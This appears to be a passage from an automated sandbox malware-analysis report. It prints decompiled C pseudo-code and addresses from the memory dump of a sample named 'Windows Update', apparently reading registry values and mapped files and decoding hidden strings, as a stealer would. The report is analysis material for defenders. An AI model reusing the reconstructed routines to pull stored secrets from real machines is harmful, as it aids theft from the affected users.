                                                                                                                    • Instruction ID: 80db4caffa7e0a4d8ed7a010a8087f9baddef1191e490bce86adc70a8d78e1ca
                                                                                                                    • Opcode Fuzzy Hash: adcf96810240cb81483a1b8cba20a1ef46843c7a676d06241c54a43d84c2eb00
                                                                                                                    • Instruction Fuzzy Hash: FB41BD71D0438D9ACF11DFF8D841AFEBBF8AB55300F14816AE859EB242DB359A05CB51
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 000A05AC Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 104COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 19%
                                                                                                                    			E000A05AC(intOrPtr _a4, intOrPtr _a8, char _a12) {
				signed int _v8;
				char _v508;
				char _v1532;
				char _v2556;
				long _v7556;
				int _v7560;
				char _v7564;
				char _v7568;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t37;
				intOrPtr _t42;
				void* _t51;
				void* _t57;
				intOrPtr _t58;
				void* _t59;
				signed int _t61;

				L000FBE9C(0x1d8c);
				_v8 =  *0x482960 ^ _t61;
				_t2 =  &_a12; // 0xa0a73
				_t58 =  *_t2;
				_v7560 = 0x400;
				swprintf( &_v7556, 0x400, 0x47471c, _t58);
				_push( &_v7564);
				_push(0x20019);
				_push(0);
				_push( &_v7556);
				_push(0x80000001);
				if( *0x474018() != 0) {
					L6:
					__eflags = _v8 ^ _t61;
					return L000FBE87(_t32, _t51, _v8 ^ _t61, _t57, _t58, _t59);
				} else {
					_v7560 = 0x400;
					_t37 =  *0x474014(_v7564, 0x474744, 0,  &_v7568,  &_v2556,  &_v7560, _t59);
					_t32 =  *0x474010(_v7564);
					_pop(_t59);
					if(_t37 != 0 || E0009F42C(_a4, _a8,  &_v2556,  &_v1532) == 0) {
						goto L6;
					} else {
						E000FC711( &_v508, 0x1f4, 0x474a90);
						_t42 =  *0x483d84;
						_t71 = _t42;
						if(_t42 != 0) {
							_push( &_v508);
							_push(0x474b44);
							_push(_t42);
							E000FDBDE(_t51, _t58, _t59, __eflags);
							_push(_t58);
							_push(0x474b58);
							_push( *0x483d84);
							E000FDBDE(_t51, _t58, _t59, __eflags);
							E000FDCF0( *0x483d84, 0x474b68,  &_v1532);
							_push( *0x483d84);
							_push(0x474b78);
							_t32 = E000FDD09(_t51, _t58, _t59, __eflags);
							goto L6;
						} else {
							_push( &_v1532);
							_push(_t58);
							_push( &_v508);
							return L000FBE87(L000FDF32(_t58, _t59, _t71), _t51, _v8 ^ _t61, _t57, _t58, _t59, 0x474b2c);
						}
					}
				}
			}





















                                                                                                                    0x000a05b4
                                                                                                                    0x000a05c0
                                                                                                                    0x000a05c4
                                                                                                                    0x000a05c4
                                                                                                                    0x000a05d9
                                                                                                                    0x000a05e3
                                                                                                                    0x000a05f1
                                                                                                                    0x000a05f2
                                                                                                                    0x000a05f7
                                                                                                                    0x000a05ff
                                                                                                                    0x000a0600
                                                                                                                    0x000a060d
                                                                                                                    0x000a071b
                                                                                                                    0x000a071e
                                                                                                                    0x000a0729
                                                                                                                    0x000a0613
                                                                                                                    0x000a0636
                                                                                                                    0x000a0640
                                                                                                                    0x000a064e
                                                                                                                    0x000a0656
                                                                                                                    0x000a0657
                                                                                                                    0x00000000
                                                                                                                    0x000a0681
                                                                                                                    0x000a0692
                                                                                                                    0x000a0697
                                                                                                                    0x000a069f
                                                                                                                    0x000a06a1
                                                                                                                    0x000a06d4
                                                                                                                    0x000a06d5
                                                                                                                    0x000a06da
                                                                                                                    0x000a06db
                                                                                                                    0x000a06e0
                                                                                                                    0x000a06e1
                                                                                                                    0x000a06e6
                                                                                                                    0x000a06ec
                                                                                                                    0x000a0703
                                                                                                                    0x000a0708
                                                                                                                    0x000a070e
                                                                                                                    0x000a0713
                                                                                                                    0x00000000
                                                                                                                    0x000a06a3
                                                                                                                    0x000a06a9
                                                                                                                    0x000a06aa
                                                                                                                    0x000a06b1
                                                                                                                    0x000a06cd
                                                                                                                    0x000a06cd
                                                                                                                    0x000a06a1
                                                                                                                    0x000a0657

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Offset: 00010000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.301191899.0000000000010000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_10000_Windows Update.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _fprintf$_wprintfswprintf
                                                                                                                    • String ID: s
                                                                                                                    • API String ID: 1838901435-3016494735
                                                                                                                    • Opcode ID: 153e71cd2766c3e643532dcd5ca0fb932407f8bea2ce10dbf7ab084d9b140f2a
                                                                                                                    • Instruction ID: c8bf240310a050c00001a8577cc5cd52138e05ea8c5251ea3315c6b99ddcd77b
                                                                                                                    • Opcode Fuzzy Hash: 153e71cd2766c3e643532dcd5ca0fb932407f8bea2ce10dbf7ab084d9b140f2a
                                                                                                                    • Instruction Fuzzy Hash: A231327298011DABDB50DF94DC42FFEB3BCEB44704F0104A6FA08A2152EB75AE94AF55
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0009F7EC Relevance: 7.8, APIs: 5, Instructions: 305COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 55%
                                                                                                                    			E0009F7EC(void* __ebx, signed int __edx, void* __edi, void* __esi, char _a4) {
				intOrPtr _v0;
				signed int _v8;
				signed int _v12;
				signed int _v36;
				char _v72;
				char _v584;
				char _v1096;
				char _v1224;
				char _v1736;
				char _v2236;
				long _v3276;
				intOrPtr _v3280;
				signed int _v3284;
				signed int _v3288;
				signed int _v3292;
				signed int _v3296;
				char _v3300;
				signed int _v3304;
				intOrPtr _v3308;
				char _v3312;
				signed int _v3328;
				char _v3340;
				void* _v3484;
				void* _t113;
				void* _t119;
				signed int _t124;
				signed int _t125;
				signed int _t126;
				signed int _t134;
				signed int _t137;
				signed int _t138;
				signed int _t139;
				signed int _t146;
				signed int _t148;
				signed int _t155;
				signed int _t160;
				signed int _t163;
				signed int _t169;
				void* _t177;
				void* _t202;
				signed int _t211;
				signed int _t218;
				signed int _t223;
				signed int _t225;
				signed int _t228;
				char* _t242;
				void* _t243;
				signed int _t249;
				signed int _t255;
				signed int _t263;
				void* _t264;
				void* _t265;
				intOrPtr _t266;
				signed int _t267;
				signed int _t268;
				intOrPtr _t270;
				void* _t271;
				void* _t272;
				signed int _t276;
				intOrPtr* _t279;
				intOrPtr* _t281;
				intOrPtr* _t286;
				intOrPtr* _t289;
				intOrPtr* _t291;
				signed int _t294;
				intOrPtr _t297;
				void* _t298;
				void* _t299;
				signed int _t301;
				signed int _t302;
				void* _t303;
				intOrPtr _t305;
				void* _t307;
				signed int _t308;
				void* _t309;
				signed int _t310;
				void* _t311;
				void* _t312;
				signed int _t313;
				signed int _t314;
				void* _t315;
				signed int _t319;
				signed int _t321;
				signed int _t322;
				void* _t323;
				void* _t324;
				signed int _t325;
				signed int _t333;
				void* _t336;
				void* _t339;
				void* _t340;
				void* _t341;
				void* _t342;
				void* _t343;
				void* _t350;
				void* _t351;
				void* _t353;

				_t294 = __edx;
				_t325 = _t333;
				_v8 =  *0x482960 ^ _t325;
				 *0x47405c(0x410,  &_v3276, __edi, __esi, __ebx, _t324);
				E000FE576(_t272, __edx, _t353,  &_v3312);
				_t297 = _v3308;
				_t305 = _v3312;
				_t113 = E000FE67C(E000FE5CC(_t305, _t297, 0x22b, 0), _t294, 0x22b, 0);
				asm("sbb edi, edx");
				swprintf( &_v3276, 0x410, 0x4747d4,  &_v3276, _t305 - _t113, _t297);
				_t336 = _t333 - 0xd08 + 0x1c;
				 *0x47406c(_a4,  &_v3276, 0);
				_t119 =  *0x474060( &_v3276, 0x80000000, 1, 0, 3, 0, 0);
				if(_t119 != 0xffffffff) {
					_t263 =  *0x474054(_t119, 0, 2, 0, 0, 0);
					_v3296 = _t263;
					__eflags = _t263;
					if(_t263 == 0) {
						goto L1;
					} else {
						_t124 =  *0x47404c(_t263, 4, 0, 0, 0);
						_v3284 = _t124;
						__eflags = _t124;
						if(_t124 != 0) {
							_t125 =  *0x47403c(_t124,  &_v3340, 0x1c);
							__eflags = _t125;
							if(_t125 != 0) {
								_t126 = _v3328;
								_t276 = _v3284;
								_v3292 = _t126;
								_t308 = _t276;
								_v3300 = 0;
								__eflags = _t126;
								if(_t126 == 0) {
									goto L67;
								} else {
									while(1) {
										_t310 = E000FD0AC(_t308, 0x5f, _t126 - _t308 + _t276);
										_t339 = _t336 + 0xc;
										__eflags = _t310;
										if(_t310 == 0) {
											break;
										}
										_t311 = _t310 - 2;
										_t134 = E000FD159(_t311, 0x4747ec, 0xc);
										_t336 = _t339 + 0xc;
										__eflags = _t134;
										if(_t134 == 0) {
											_v1224 = 0;
											E000FC711( &_v72, 0x40, 0x4747fc);
											_t312 = _t311 + 0xf;
											_v3288 = 0;
											_v3304 = 0;
											_t137 = E000FD159(_t312, 0x4746c4, 3);
											_t340 = _t336 + 0x18;
											__eflags = _t137;
											if(_t137 != 0) {
												_t138 = E000FD159(_t312, 0x474808, 5);
												_t340 = _t340 + 0xc;
												__eflags = _t138;
												if(_t138 != 0) {
													_t139 = E000FD159(_t312, 0x474810, 6);
													_t336 = _t340 + 0xc;
													__eflags = _t139;
													if(_t139 != 0) {
														_t308 = _t312 + 3;
														__eflags = _t308;
														goto L63;
													} else {
														_t266 = 0xd;
														_v3280 = 0xd;
														E000FC711( &_v72, 0x40, 0x474818);
														_t308 = _t312 + 6;
														_t33 = _t308 + 1; // -22
														_v3288 = 1;
														_t146 = E000FD159(_t33, 0x474828, 9);
														_t341 = _t336 + 0x18;
														__eflags = _t146;
														if(_t146 != 0) {
															_v1096 = 0;
														} else {
															_t319 = _t308 +  *_t308;
															__eflags = _t319;
															E000FD273( &_v1096, 0x200, _t319 + 4,  *((char*)(_t319 + 2)));
															_t289 =  &_v1096;
															_t341 = _t341 + 0x10;
															_t294 = _t289 + 1;
															do {
																_t249 =  *_t289;
																_t289 = _t289 + 1;
																__eflags = _t249;
															} while (_t249 != 0);
															_t308 = _t319 + 4 + _t289 - _t294;
														}
														_t41 = _t308 + 1; // -26
														_t148 = E000FD159(_t41, 0x474834, 0xb);
														_t336 = _t341 + 0xc;
														__eflags = _t148;
														if(_t148 != 0) {
															goto L63;
														} else {
															_t308 = _t308 +  *_t308 + 2;
															__eflags = _t308;
															_t42 = _t308 + 2; // -25
															E000FD273( &_v1736, 0x200, _t42,  *_t308);
															_t279 =  &_v1736;
															_t342 = _t336 + 0x10;
															_t294 = _t279 + 1;
															do {
																_t155 =  *_t279;
																_t279 = _t279 + 1;
																__eflags = _t155;
															} while (_t155 != 0);
															E000FCA6C( &_v1736, _t279 - _t294 + 1);
															_t160 = E000FCABC( &_v1736, 0x474840);
															_t336 = _t342 + 0x10;
															__eflags = _t160;
															if(_t160 == 0) {
																goto L63;
															} else {
																E000FC711( &_v1224, 0x80, 0x47484c);
																_t281 =  &_v1736;
																_t343 = _t336 + 0xc;
																_t294 = _t281 + 1;
																do {
																	_t163 =  *_t281;
																	_t281 = _t281 + 1;
																	__eflags = _t163;
																} while (_t163 != 0);
																_t313 = _t308 + 2;
																__eflags = _t313;
																goto L32;
															}
														}
													}
												} else {
													_v3304 = 1;
													_t321 = _t312 + 5;
													__eflags = _t321;
													goto L16;
												}
											} else {
												_t321 = _t312 + 3;
												L16:
												_t322 = _t321 +  *_t321;
												__eflags = _t322;
												_t266 = 8;
												_v3280 = 8;
												E000FD273( &_v1096, 0x200, _t322 + 4,  *((char*)(_t322 + 2)));
												_t291 =  &_v1096;
												_t343 = _t340 + 0x10;
												_t294 = _t291 + 1;
												do {
													_t255 =  *_t291;
													_t291 = _t291 + 1;
													__eflags = _t255;
												} while (_t255 != 0);
												_t313 = _t322 + 4;
												L32:
												_t282 = _t281 - _t294;
												_t308 = _t313 + _t281 - _t294;
												__eflags = _t308;
												_t300 = _t308;
												while(1) {
													_t267 = E000FD0AC(_t300, _t266, _v3292 - _t300 + _v3284);
													_t336 = _t343 + 0xc;
													__eflags = _t267;
													if(_t267 == 0) {
														goto L63;
													}
													_t56 = _t267 + 1; // 0x1
													_t300 = _t56;
													_t169 = E000FD159(_t56,  &_v72, _v3280);
													_t336 = _t336 + 0xc;
													__eflags = _t169;
													if(_t169 == 0) {
														_t301 =  *((char*)(_t267 + _v3280 + 4 - 2));
														L000FBECC( &_v584, _v3280 + 4 + _t267, _t301);
														_t268 = _v3288;
														_t336 = _t336 + 0xc;
														__eflags = _t268;
														if(_t268 == 0) {
															_t282 = 0;
															__eflags = _t301;
															if(_t301 != 0) {
																__eflags = _t301 - 0x10;
																if(_t301 >= 0x10) {
																	asm("movdqa xmm1, [0x4751a0]");
																	_t294 = _t301 - (_t301 & 0x0000000f);
																	__eflags = _t294;
																	_t242 =  &_v584;
																	do {
																		asm("movdqu xmm0, [eax]");
																		_t282 = _t282 + 0x10;
																		asm("psubb xmm0, xmm1");
																		asm("movdqu [eax], xmm0");
																		_t242 = _t242 + 0x10;
																		__eflags = _t282 - _t294;
																	} while (_t282 < _t294);
																}
																__eflags = _t282 - _t301;
																while(_t282 < _t301) {
																	 *((char*)(_t325 + _t282 - 0x244)) =  *((char*)(_t325 + _t282 - 0x244)) + 0xfb;
																	_t282 = _t282 + 1;
																	__eflags = _t282 - _t301;
																}
															}
														} else {
															_t243 = 0;
															__eflags = _t301;
															if(_t301 != 0) {
																do {
																	 *(_t325 + _t243 - 0x244) =  *(_t325 + _t243 - 0x244) ^ 0x000000c3;
																	_t243 = _t243 + 1;
																	__eflags = _t243 - _t301;
																} while (_t243 < _t301);
															}
														}
														__eflags = _t301 - 0x200;
														if(_t301 >= 0x200) {
															L000FCFD2();
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															_push(_t325);
															_push(_t308);
															_t314 =  *(_t336 + 8);
															__eflags = _t314;
															if(_t314 == 0) {
																E000A323C();
																_t177 =  *0x474044(0xfffffff5);
																 *0x474078(_t177, 0xa);
																_push(0x4747fc);
																_push(0x474f9c);
																_push(0x474fa8);
																_push(0x474fb4);
																L78();
																_push(0x474fd0);
																L78();
																goto L75;
															} else {
																_t218 = E000FDB99(0x483d84, _t314, 0x474e24);
																_t282 =  *0x483d84;
																__eflags = _t282;
																if(_t282 == 0) {
																	L73:
																	return E000A158C(0x474e28, _t314);
																} else {
																	__eflags = _t218;
																	if(__eflags != 0) {
																		goto L73;
																	} else {
																		_push(_t282);
																		_push(0x474ea0);
																		E000FDD09(_t268, _t301, _t314, __eflags);
																		_push( *0x483d84);
																		_push(0x474ef8);
																		E000FDD09(_t268, _t301, _t314, __eflags);
																		_push( *0x483d84);
																		_push(0x474f48);
																		E000FDD09(_t268, _t301, _t314, __eflags);
																		L75:
																		E000A505C();
																		E0009E5CC(_t282);
																		E000A096C(_t268, _t294);
																		E000A121C();
																		E000A146C(__eflags);
																		E000A0C8C(_t268, _t294, _t301, _t314);
																		L000A0D9C(_t268, _t294, _t301, _t314);
																		E000A0ACC(_t268, _t294, _t301, _t314);
																		E000A25AC();
																		L000A2EDC(_t268, _t282, _t294, __eflags);
																		E000A27CC(_t294, _t301, _t314);
																		E000A50EC(_t268, _t294, _t301, 0x20019);
																		E000A547C(0x20019);
																		E000A30AC();
																		E000A14FC();
																		__eflags = _t314;
																		if(__eflags == 0) {
																			_pop(_t315);
																			_v0 = 0x4750cc;
																			_push(0xc);
																			_push(0x480d70);
																			E001028FC(_t268, _t301, _t315);
																			_v0 = _v0 != 0;
																			if(_v0 != 0) {
																				E00102CCB(1, E00102C86() + 0x20);
																				_v12 = _v12 & 0x00000000;
																				_t202 = E00102B22(_t268, __eflags, E00102C86() + 0x20);
																				_t302 = E00101235(E00102C86() + 0x20, _v0, 0,  &_a4);
																				_v36 = _t302;
																				__eflags = E00102C86() + 0x20;
																				E00102AF1(_t202, E00102C86() + 0x20);
																				_v12 = 0xfffffffe;
																				L000FDFCB();
																				_t211 = _t302;
																			} else {
																				 *((intOrPtr*)(E00100A4A())) = 0x16;
																				_t211 = E001009DB() | 0xffffffff;
																			}
																			return E00102941(_t211);
																		} else {
																			_push(0x475030);
																			_push( *0x483d84);
																			E000FDBDE(_t268, _t301, _t314, __eflags);
																			_push(0x474494);
																			_push(0x475080);
																			_push( *0x483d84);
																			E000FDBDE(_t268, _t301, _t314, __eflags);
																			_push( *0x483d84);
																			return E000FD91F(_t268, _t301, _t314, __eflags);
																		}
																	}
																}
															}
														} else {
															_t286 =  &_v584;
															 *((char*)(_t325 + _t301 - 0x244)) = 0;
															_t294 = _t286 + 1;
															do {
																_t223 =  *_t286;
																_t286 = _t286 + 1;
																__eflags = _t223;
															} while (_t223 != 0);
															__eflags = _t286 != _t294;
															if(_t286 != _t294) {
																_t225 = L000FBD5C( &_v1096, 0x40);
																_t350 = _t336 + 8;
																__eflags = _t225;
																if(_t225 == 0) {
																	__eflags = _t268;
																	if(_t268 == 0) {
																		__eflags = _v3304;
																		if(_v3304 != 0) {
																			_push(0x4746e8);
																			goto L58;
																		}
																	} else {
																		_push(0x4746dc);
																		L58:
																		_push(0x200);
																		_push( &_v1096);
																		E000FC766();
																		_t350 = _t350 + 0xc;
																	}
																}
																E000FC711( &_v2236, 0x1f4, 0x474afc);
																_t228 =  *0x483d84;
																_t351 = _t350 + 0xc;
																__eflags = _t228;
																if(__eflags != 0) {
																	_push( &_v2236);
																	_push(0x474b44);
																	_push(_t228);
																	E000FDBDE(_t268, _t301, _t308, __eflags);
																	_push( &_v1096);
																	_push(0x474b58);
																	_push( *0x483d84);
																	E000FDBDE(_t268, _t301, _t308, __eflags);
																	E000FDCF0( *0x483d84, 0x474b68,  &_v584);
																	_push( *0x483d84);
																	_push(0x474b78);
																	E000FDD09(_t268, _t301, _t308, __eflags);
																	_t336 = _t351 + 0x2c;
																} else {
																	_push( &_v584);
																	_push( &_v1096);
																	_push( &_v2236);
																	_push(0x474b2c);
																	L78();
																	_t336 = _t351 + 0x10;
																}
															}
															goto L63;
														}
													} else {
														_t270 = _v3300 + 1;
														_v3300 = _t270;
														__eflags = _t270 - 5;
														if(_t270 >= 5) {
															goto L63;
														} else {
															_t266 = _v3280;
															continue;
														}
													}
													goto L82;
												}
												goto L63;
											}
										} else {
											_t308 = _t311 + 4;
											L63:
											_t276 = _v3284;
											__eflags = _v3292 - _t308 + _t276;
											if(_v3292 - _t308 + _t276 == 0) {
												L66:
												_t263 = _v3296;
												goto L67;
											} else {
												_t126 = _v3292;
												continue;
											}
										}
										goto L82;
									}
									_t276 = _v3284;
									goto L66;
								}
							} else {
								 *0x47412c();
								_t276 = _v3284;
								L67:
								 *0x474050();
								 *0x474124();
								_t299 = _t263;
								_t309 = _t276;
								__eflags = _v8 ^ _t325;
								_pop(_t265);
								return L000FBE87(1, _t265, _v8 ^ _t325, _t294, _t299, _t309);
							}
						} else {
							 *0x47412c();
							 *0x474124();
							_t303 = _t263;
							_pop(_t323);
							_pop(_t271);
							__eflags = _v8 ^ _t325;
							return L000FBE87(0, _t271, _v8 ^ _t325, _t294, _t303, _t323);
						}
					}
				} else {
					L1:
					 *0x47412c();
					_pop(_t298);
					_pop(_t307);
					_pop(_t264);
					return L000FBE87(0, _t264, _v8 ^ _t325, _t294, _t298, _t307);
				}
				L82:
			}




































































































                                                                                                                    0x0009f7ec
                                                                                                                    0x0009f7ed
                                                                                                                    0x0009f7fc
                                                                                                                    0x0009f811
                                                                                                                    0x0009f81e
                                                                                                                    0x0009f823
                                                                                                                    0x0009f829
                                                                                                                    0x0009f849
                                                                                                                    0x0009f850
                                                                                                                    0x0009f866
                                                                                                                    0x0009f86b
                                                                                                                    0x0009f878
                                                                                                                    0x0009f894
                                                                                                                    0x0009f89d
                                                                                                                    0x0009f8c9
                                                                                                                    0x0009f8cb
                                                                                                                    0x0009f8d1
                                                                                                                    0x0009f8d3
                                                                                                                    0x00000000
                                                                                                                    0x0009f8d5
                                                                                                                    0x0009f8de
                                                                                                                    0x0009f8e4
                                                                                                                    0x0009f8ea
                                                                                                                    0x0009f8ec
                                                                                                                    0x0009f918
                                                                                                                    0x0009f91e
                                                                                                                    0x0009f920
                                                                                                                    0x0009f933
                                                                                                                    0x0009f939
                                                                                                                    0x0009f93f
                                                                                                                    0x0009f945
                                                                                                                    0x0009f947
                                                                                                                    0x0009f951
                                                                                                                    0x0009f953
                                                                                                                    0x00000000
                                                                                                                    0x0009f95c
                                                                                                                    0x0009f95c
                                                                                                                    0x0009f969
                                                                                                                    0x0009f96b
                                                                                                                    0x0009f96e
                                                                                                                    0x0009f970
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0009f978
                                                                                                                    0x0009f981
                                                                                                                    0x0009f986
                                                                                                                    0x0009f989
                                                                                                                    0x0009f98b
                                                                                                                    0x0009f9a0
                                                                                                                    0x0009f9a7
                                                                                                                    0x0009f9ae
                                                                                                                    0x0009f9b7
                                                                                                                    0x0009f9c1
                                                                                                                    0x0009f9cb
                                                                                                                    0x0009f9d0
                                                                                                                    0x0009f9d3
                                                                                                                    0x0009f9d5
                                                                                                                    0x0009f9e4
                                                                                                                    0x0009f9e9
                                                                                                                    0x0009f9ec
                                                                                                                    0x0009f9ee
                                                                                                                    0x0009fa4a
                                                                                                                    0x0009fa4f
                                                                                                                    0x0009fa52
                                                                                                                    0x0009fa54
                                                                                                                    0x0009fd88
                                                                                                                    0x0009fd88
                                                                                                                    0x00000000
                                                                                                                    0x0009fa5a
                                                                                                                    0x0009fa64
                                                                                                                    0x0009fa6a
                                                                                                                    0x0009fa70
                                                                                                                    0x0009fa75
                                                                                                                    0x0009fa7a
                                                                                                                    0x0009fa83
                                                                                                                    0x0009fa8d
                                                                                                                    0x0009fa92
                                                                                                                    0x0009fa95
                                                                                                                    0x0009fa97
                                                                                                                    0x0009fad4
                                                                                                                    0x0009fa99
                                                                                                                    0x0009fa9c
                                                                                                                    0x0009fa9c
                                                                                                                    0x0009fab3
                                                                                                                    0x0009fab8
                                                                                                                    0x0009fabe
                                                                                                                    0x0009fac1
                                                                                                                    0x0009fac4
                                                                                                                    0x0009fac4
                                                                                                                    0x0009fac6
                                                                                                                    0x0009fac7
                                                                                                                    0x0009fac7
                                                                                                                    0x0009fad0
                                                                                                                    0x0009fad0
                                                                                                                    0x0009fadd
                                                                                                                    0x0009fae6
                                                                                                                    0x0009faeb
                                                                                                                    0x0009faee
                                                                                                                    0x0009faf0
                                                                                                                    0x00000000
                                                                                                                    0x0009faf6
                                                                                                                    0x0009fafc
                                                                                                                    0x0009fafc
                                                                                                                    0x0009fb02
                                                                                                                    0x0009fb12
                                                                                                                    0x0009fb17
                                                                                                                    0x0009fb1d
                                                                                                                    0x0009fb20
                                                                                                                    0x0009fb23
                                                                                                                    0x0009fb23
                                                                                                                    0x0009fb25
                                                                                                                    0x0009fb26
                                                                                                                    0x0009fb26
                                                                                                                    0x0009fb37
                                                                                                                    0x0009fb48
                                                                                                                    0x0009fb4d
                                                                                                                    0x0009fb50
                                                                                                                    0x0009fb52
                                                                                                                    0x00000000
                                                                                                                    0x0009fb58
                                                                                                                    0x0009fb69
                                                                                                                    0x0009fb6e
                                                                                                                    0x0009fb74
                                                                                                                    0x0009fb77
                                                                                                                    0x0009fb7c
                                                                                                                    0x0009fb7c
                                                                                                                    0x0009fb7e
                                                                                                                    0x0009fb7f
                                                                                                                    0x0009fb7f
                                                                                                                    0x0009fb83
                                                                                                                    0x0009fb83
                                                                                                                    0x00000000
                                                                                                                    0x0009fb83
                                                                                                                    0x0009fb52
                                                                                                                    0x0009faf0
                                                                                                                    0x0009f9f0
                                                                                                                    0x0009f9f0
                                                                                                                    0x0009f9fa
                                                                                                                    0x0009f9fa
                                                                                                                    0x00000000
                                                                                                                    0x0009f9fa
                                                                                                                    0x0009f9d7
                                                                                                                    0x0009f9d7
                                                                                                                    0x0009f9fd
                                                                                                                    0x0009fa00
                                                                                                                    0x0009fa00
                                                                                                                    0x0009fa02
                                                                                                                    0x0009fa1c
                                                                                                                    0x0009fa22
                                                                                                                    0x0009fa27
                                                                                                                    0x0009fa2d
                                                                                                                    0x0009fa30
                                                                                                                    0x0009fa33
                                                                                                                    0x0009fa33
                                                                                                                    0x0009fa35
                                                                                                                    0x0009fa36
                                                                                                                    0x0009fa36
                                                                                                                    0x0009fa3a
                                                                                                                    0x0009fb86
                                                                                                                    0x0009fb86
                                                                                                                    0x0009fb88
                                                                                                                    0x0009fb88
                                                                                                                    0x0009fb8a
                                                                                                                    0x0009fb8c
                                                                                                                    0x0009fba2
                                                                                                                    0x0009fba4
                                                                                                                    0x0009fba7
                                                                                                                    0x0009fba9
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0009fbb9
                                                                                                                    0x0009fbb9
                                                                                                                    0x0009fbbd
                                                                                                                    0x0009fbc2
                                                                                                                    0x0009fbc5
                                                                                                                    0x0009fbc7
                                                                                                                    0x0009fbf0
                                                                                                                    0x0009fc00
                                                                                                                    0x0009fc05
                                                                                                                    0x0009fc0b
                                                                                                                    0x0009fc0e
                                                                                                                    0x0009fc10
                                                                                                                    0x0009fc2b
                                                                                                                    0x0009fc2d
                                                                                                                    0x0009fc2f
                                                                                                                    0x0009fc31
                                                                                                                    0x0009fc34
                                                                                                                    0x0009fc36
                                                                                                                    0x0009fc45
                                                                                                                    0x0009fc45
                                                                                                                    0x0009fc47
                                                                                                                    0x0009fc4d
                                                                                                                    0x0009fc4d
                                                                                                                    0x0009fc51
                                                                                                                    0x0009fc54
                                                                                                                    0x0009fc58
                                                                                                                    0x0009fc5c
                                                                                                                    0x0009fc5f
                                                                                                                    0x0009fc5f
                                                                                                                    0x0009fc4d
                                                                                                                    0x0009fc63
                                                                                                                    0x0009fc65
                                                                                                                    0x0009fc6c
                                                                                                                    0x0009fc74
                                                                                                                    0x0009fc75
                                                                                                                    0x0009fc75
                                                                                                                    0x0009fc65
                                                                                                                    0x0009fc12
                                                                                                                    0x0009fc12
                                                                                                                    0x0009fc14
                                                                                                                    0x0009fc16
                                                                                                                    0x0009fc1c
                                                                                                                    0x0009fc1c
                                                                                                                    0x0009fc24
                                                                                                                    0x0009fc25
                                                                                                                    0x0009fc25
                                                                                                                    0x0009fc29
                                                                                                                    0x0009fc16
                                                                                                                    0x0009fc79
                                                                                                                    0x0009fc7f
                                                                                                                    0x0009fdd8
                                                                                                                    0x0009fddd
                                                                                                                    0x0009fdde
                                                                                                                    0x0009fddf
                                                                                                                    0x0009fde0
                                                                                                                    0x0009fde1
                                                                                                                    0x0009fde2
                                                                                                                    0x0009fde3
                                                                                                                    0x0009fde4
                                                                                                                    0x0009fde5
                                                                                                                    0x0009fde6
                                                                                                                    0x0009fde7
                                                                                                                    0x0009fde8
                                                                                                                    0x0009fde9
                                                                                                                    0x0009fdea
                                                                                                                    0x0009fdeb
                                                                                                                    0x0009fdec
                                                                                                                    0x0009fdef
                                                                                                                    0x0009fdf0
                                                                                                                    0x0009fdf3
                                                                                                                    0x0009fdf5
                                                                                                                    0x0009fe59
                                                                                                                    0x0009fe60
                                                                                                                    0x0009fe69
                                                                                                                    0x0009fe6f
                                                                                                                    0x0009fe74
                                                                                                                    0x0009fe79
                                                                                                                    0x0009fe7e
                                                                                                                    0x0009fe83
                                                                                                                    0x0009fe88
                                                                                                                    0x0009fe8d
                                                                                                                    0x00000000
                                                                                                                    0x0009fdf7
                                                                                                                    0x0009fe02
                                                                                                                    0x0009fe07
                                                                                                                    0x0009fe10
                                                                                                                    0x0009fe12
                                                                                                                    0x0009fe48
                                                                                                                    0x0009fe58
                                                                                                                    0x0009fe14
                                                                                                                    0x0009fe14
                                                                                                                    0x0009fe16
                                                                                                                    0x00000000
                                                                                                                    0x0009fe18
                                                                                                                    0x0009fe18
                                                                                                                    0x0009fe19
                                                                                                                    0x0009fe1e
                                                                                                                    0x0009fe23
                                                                                                                    0x0009fe29
                                                                                                                    0x0009fe2e
                                                                                                                    0x0009fe33
                                                                                                                    0x0009fe39
                                                                                                                    0x0009fe3e
                                                                                                                    0x0009fe95
                                                                                                                    0x0009fe95
                                                                                                                    0x0009fe9a
                                                                                                                    0x0009fe9f
                                                                                                                    0x0009fea4
                                                                                                                    0x0009fea9
                                                                                                                    0x0009feae
                                                                                                                    0x0009feb3
                                                                                                                    0x0009feb8
                                                                                                                    0x0009febd
                                                                                                                    0x0009fec2
                                                                                                                    0x0009fec7
                                                                                                                    0x0009fed1
                                                                                                                    0x0009fedb
                                                                                                                    0x0009fee3
                                                                                                                    0x0009fee8
                                                                                                                    0x0009feed
                                                                                                                    0x0009feef
                                                                                                                    0x0009ff27
                                                                                                                    0x0009ff28
                                                                                                                    0x000fdf32
                                                                                                                    0x000fdf34
                                                                                                                    0x000fdf39
                                                                                                                    0x000fdf46
                                                                                                                    0x000fdf48
                                                                                                                    0x000fdf6a
                                                                                                                    0x000fdf71
                                                                                                                    0x000fdf7e
                                                                                                                    0x000fdf9d
                                                                                                                    0x000fdf9f
                                                                                                                    0x000fdfa7
                                                                                                                    0x000fdfac
                                                                                                                    0x000fdfb4
                                                                                                                    0x000fdfbb
                                                                                                                    0x000fdfc0
                                                                                                                    0x000fdf4a
                                                                                                                    0x000fdf4f
                                                                                                                    0x000fdf5a
                                                                                                                    0x000fdf5a
